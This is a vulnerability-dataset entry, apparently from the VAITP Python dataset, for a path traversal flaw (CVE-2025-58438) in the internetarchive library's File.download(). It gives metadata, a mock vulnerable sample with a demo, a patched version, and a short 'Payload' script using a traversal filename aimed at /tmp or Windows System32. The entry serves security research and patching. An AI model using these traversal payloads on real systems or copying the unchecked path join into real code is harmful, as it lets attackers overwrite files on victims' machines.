VAITP Dataset

← Back to the dataset

CVE-2025-58438

internetarchive path traversal in File.download() allows arbitrary file write.

  • CVSS 9.4
  • CWE-22
  • Input Validation and Sanitization
  • Remote

internetarchive is a Python and Command-Line Interface to Archive.org In versions 5.5.0 and below, there is a directory traversal (path traversal) vulnerability in the File.download() method of the internetarchive library. The file.download() method does not properly sanitize user-supplied filenames or validate the final download path. A maliciously crafted filename could contain path traversal sequences (e.g., ../../../../windows/system32/file.txt) or illegal characters that, when processed, would cause the file to be written outside of the intended target directory. An attacker could potentially overwrite critical system files or application configuration files, leading to a denial of service, privilege escalation, or remote code execution, depending on the context in which the library is used. The vulnerability is particularly critical for users on Windows systems, but all operating systems are affected. This issue is fixed in version 5.5.1.

CVSS base score
9.4
Published
2025-09-06
OWASP
A08 Software and Data Integrity Failures
Orthogonal defect classification
Checking
Code defect classification
Missing Check
Category
Input Validation and Sanitization
Subcategory
Path Traversal
Accessibility scope
Remote
Impact
Arbitrary Code Execution
Fixed by upgrading
Yes

Solution

Upgrade internetarchive to version 5.5.1 or later.

Vulnerable code sample

import os
import urllib.parse

# This code is a conceptual representation of the vulnerability described
# in CVE-2025-58438 for educational purposes. It simulates the flawed
# logic present in internetarchive versions 5.5.0 and below.

class File:
    """
    A mock class to represent a file from an internet archive item.
    """
    def __init__(self, name, content=b"mock file content"):
        # The 'name' attribute holds the filename as provided by the archive,
        # which could be controlled by an attacker.
        self.name = name
        self._content = content

    def download(self, destdir='.', **kwargs):
        """
        A mock download method vulnerable to path traversal.
        It does not sanitize the filename or validate the final path.
        """
        print(f"Attempting to download file: '{self.name}' to directory: '{destdir}'")

        # VULNERABLE PART: The filename is directly joined with the destination
        # directory without any sanitization or path validation.
        # os.path.join will naively process ".." sequences.
        # e.g., os.path.join("downloads", "../../pwned.txt") becomes "pwned.txt"
        # on Linux/macOS or "..\pwned.txt" on Windows, placing the file
        # outside the intended 'downloads' directory.
        filepath = os.path.join(destdir, urllib.parse.unquote(self.name))
        
        # The real library would create directories if they don't exist.
        # This behavior aids the attack by creating the traversed path.
        try:
            dir_to_create = os.path.dirname(filepath)
            if dir_to_create:
                os.makedirs(dir_to_create, exist_ok=True)
        except OSError as e:
            print(f"Error creating directory: {e}")
            return

        print(f"Resolved path to write file: '{os.path.abspath(filepath)}'")
        
        # Write the file to the potentially malicious path.
        try:
            with open(filepath, 'wb') as f:
                f.write(self._content)
            print(f"SUCCESS: File written to '{os.path.abspath(filepath)}'")
        except IOError as e:
            print(f"ERROR: Failed to write file: {e}")


if __name__ == '__main__':
    # --- Demonstration of the Vulnerability ---

    # 1. Setup the intended "safe" download directory
    TARGET_DIR = "safe_downloads"
    if not os.path.exists(TARGET_DIR):
        os.makedirs(TARGET_DIR)
    print(f"Created a safe download directory: '{os.path.abspath(TARGET_DIR)}'\n")

    # 2. Simulate a normal, non-malicious download
    print("--- Simulating a normal download ---")
    normal_file = File(name="legitimate_file.txt")
    normal_file.download(destdir=TARGET_DIR)
    print("-" * 35 + "\n")

    # 3. Simulate an attack using a malicious filename
    print("--- Simulating a PATH TRAVERSAL attack ---")
    # This filename uses ".." to traverse up from the `TARGET_DIR` and
    # write a file in the parent directory (the script's root directory).
    malicious_filename = "../../pwned_by_cve.txt"
    
    malicious_file = File(
        name=malicious_filename,
        content=b"This file was written outside the intended directory!"
    )
    
    # The download method is called, which will process the malicious path.
    malicious_file.download(destdir=TARGET_DIR)

    print("\n--- Verification ---")
    print(f"Check the contents of the script's root directory and the '{TARGET_DIR}' directory.")
    
    expected_safe_path = os.path.join(TARGET_DIR, "legitimate_file.txt")
    print(f"Expected safe file path: '{os.path.abspath(expected_safe_path)}'")
    print(f"Exists: {os.path.exists(expected_safe_path)}")

    expected_malicious_path = os.path.abspath("pwned_by_cve.txt")
    print(f"Maliciously created file path: '{expected_malicious_path}'")
    print(f"Exists: {os.path.exists(expected_malicious_path)}")

Patched code sample

import os
import pathlib

def fixed_file_download(dest_dir, remote_filename, file_content):
    """
    A representation of the patched File.download() method that prevents
    path traversal by validating the final file path.
    """
    # 1. Resolve the destination directory to an absolute, canonical path.
    # This creates a secure, trusted base directory.
    secure_base_path = pathlib.Path(dest_dir).resolve()

    # 2. Naively join the trusted base path with the untrusted remote filename.
    # At this stage, the path could contain traversal sequences like '..'.
    prospective_path = secure_base_path / remote_filename

    # 3. Resolve the prospective path to its absolute, canonical form.
    # This crucial step processes any '..' components, symbolic links, etc.,
    # revealing the true final path on the filesystem.
    resolved_path = prospective_path.resolve()

    # 4. The core security check:
    # Verify that the secure base path is a parent of the final resolved path.
    # The os.path.commonpath function is a reliable way to perform this check.
    # If the common path between the two is not the secure base path itself,
    # it means the final path has escaped the intended directory.
    common_prefix = os.path.commonpath([resolved_path, secure_base_path])

    if common_prefix != str(secure_base_path):
        # If the check fails, raise an exception to block the operation.
        raise IOError(
            f"Path traversal attempt blocked. "
            f"Resolved path '{resolved_path}' is outside the designated "
            f"directory '{secure_base_path}'."
        )

    # 5. If the path is validated as safe, proceed with the file operation.
    # Ensure the parent directory for the file exists before writing.
    os.makedirs(os.path.dirname(resolved_path), exist_ok=True)

    # Simulate writing the downloaded content to the validated path.
    with open(resolved_path, "wb") as f:
        f.write(file_content)

Payload

import internetarchive
import os

# This payload requires a prerequisite: an attacker must have uploaded a file
# to a public Archive.org item where the filename itself is a path traversal string.

# --- Attacker-controlled variables ---
# ID of the Archive.org item containing the malicious file (replace with a real one for a live test)
attacker_item_id = "cve-poc-item"
# The malicious filename uploaded by the attacker. This example targets /tmp on Linux/macOS.
malicious_filename = "../../../../tmp/pwned_by_cve.txt"
# For Windows, a payload might be: '../../../../Windows/System32/pwned.dll'

# --- Victim's vulnerable code execution ---

# The intended, safe directory for downloads
target_dir = "./downloads"
os.makedirs(target_dir, exist_ok=True)

try:
    # 1. The victim's application retrieves the item
    item = internetarchive.get_item(attacker_item_id)

    # 2. The application gets a file handle, where the file's name is the traversal payload
    malicious_file = item.get_file(malicious_filename)

    # 3. The vulnerable download method is called.
    # It will concatenate `target_dir` and `malicious_filename` without sanitization,
    # causing the file to be written outside of the `target_dir`.
    malicious_file.download(destdir=target_dir)

except Exception:
    # This exception is expected if the placeholder item and file do not actually exist.
    # The logic demonstrates the vulnerability.
    pass

Cite this entry

@misc{vaitp:cve202558438,
  title        = {{internetarchive path traversal in File.download() allows arbitrary file write.}},
  author       = {Bogaerts, Fr\'ed\'eric and Ivaki, Naghmeh and Fonseca, Jos\'e},
  year         = {2025},
  note         = {VAITP Python Vulnerability Dataset, entry CVE-2025-58438},
  howpublished = {\url{https://netpack.pt/vaitp/vulnerability/CVE-2025-58438/}}
}
Introducing the "VAITP dataset": a specialized repository of Python vulnerabilities and patches, meticulously compiled for the use of the security research community. As Python's prominence grows, understanding and addressing potential security vulnerabilities become crucial. Crafted by and for the cybersecurity community, this dataset offers a valuable resource for researchers, analysts, and developers to analyze and mitigate the security risks associated with Python. Through the comprehensive exploration of vulnerabilities and corresponding patches, the VAITP dataset fosters a safer and more resilient Python ecosystem, encouraging collaborative advancements in programming security.

The supreme art of war is to subdue the enemy without fighting.

Sun Tzu – “The Art of War”

:: Shaping the future through research and ingenuity ::